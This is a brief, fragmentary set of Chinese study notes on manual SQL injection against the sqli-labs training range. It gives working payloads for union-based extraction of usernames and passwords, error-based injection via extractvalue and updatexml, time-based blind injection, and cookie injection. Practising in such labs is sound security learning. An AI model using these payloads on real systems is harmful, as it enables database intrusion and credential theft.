ps:
整理了一下手工注入的方式,靶场地址
http://www.wangehacker.cn/sqli-labs/
针对手工注入的测试基本流程:
基本流程分为四步走
首先我们需要查询数据库名...limit 0,1 --+
最后一步爆列的具体内容
id=-1' union select 1,group_concat(username,password),3 from users --+
针对手工注入的报错注入...extractvalue(1,concat(0x7e,(database()),0x7e)) --+
' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
针对手工注入的时间盲注...table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))) < 115 --+
手工注入...'and updatexml(1,concat(0x7e,(database()),0x7e),1)#
less-21cookie注入:
和20题没任何区别,就是需要base64编码,还有闭合方式变了